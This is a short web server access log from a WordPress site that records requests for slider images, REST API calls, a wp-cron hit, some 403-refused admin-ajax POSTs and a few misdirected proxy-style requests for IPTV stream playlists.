205.169.39.55 - - [16/Oct/2025:11:20:21 +0800] "GET /wp-content/uploads/revslider/slider-1/1750929639-yuanjing_Slider_3840%C3%972160_20250626171955-scaled.webp HTTP/1.1" 200 203290 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.55 - - [16/Oct/2025:11:20:21 +0800] "GET /wp-content/uploads/2025/07/1753587901-Slider_3840%C3%972160_20250727-scaled-50x100.webp HTTP/1.1" 200 1660 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.55 - - [16/Oct/2025:11:20:21 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled-50x100.webp HTTP/1.1" 200 1416 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.55 - - [16/Oct/2025:11:20:21 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled-50x100.webp HTTP/1.1" 200 1416 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.55 - - [16/Oct/2025:11:20:21 +0800] "GET /wp-content/uploads/2025/07/1753587901-Slider_3840%C3%972160_20250727-scaled-50x100.webp HTTP/1.1" 200 1660 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.55 - - [16/Oct/2025:11:20:22 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=3 HTTP/1.1" 200 2292 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.55 - - [16/Oct/2025:11:20:22 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=2 HTTP/1.1" 200 2058 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.55 - - [16/Oct/2025:11:20:22 +0800] "GET /wp-content/uploads/2025/07/1753587901-Slider_3840%C3%972160_20250727-scaled.webp HTTP/1.1" 200 141034 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.55 - - [16/Oct/2025:11:20:23 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled.webp HTTP/1.1" 200 197360 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.55 - - [16/Oct/2025:11:20:23 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 33 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.55 - - [16/Oct/2025:11:20:30 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 33 "http://cqqizhou.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/127.0.6533.119 Safari/537.36"
205.169.39.55 - - [16/Oct/2025:11:20:30 +0800] "GET /wp-content/uploads/revslider/slider-1/1750929639-yuanjing_Slider_3840%C3%972160_20250626171955-scaled-50x100.webp HTTP/1.1" 200 1784 "http://cqqizhou.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/127.0.6533.119 Safari/537.36"
39.180.80.209 - - [16/Oct/2025:11:20:52 +0800] "GET http://ts-gitv-zj-yh.189smarthome.com/live/program/live/cctv1hd8m/8000000/mnf.m3u8 HTTP/1.1" 404 146 "-" "ZTE/1.0.6"
36.133.115.36 - - [16/Oct/2025:11:20:53 +0800] "POST /wp-cron.php?doing_wp_cron=1760584853.3850219249725341796875 HTTP/1.1" 404 146 "-" "WordPress/6.8.2; http://cqqizhou.com"
39.180.80.209 - - [16/Oct/2025:11:20:53 +0800] "GET http://live-gitv-js-yh.189smarthome.com/live/program/live/cctv1hd8m/8000000/mnf.m3u8 HTTP/1.1" 404 31381 "-" "ZTE/1.0.6"
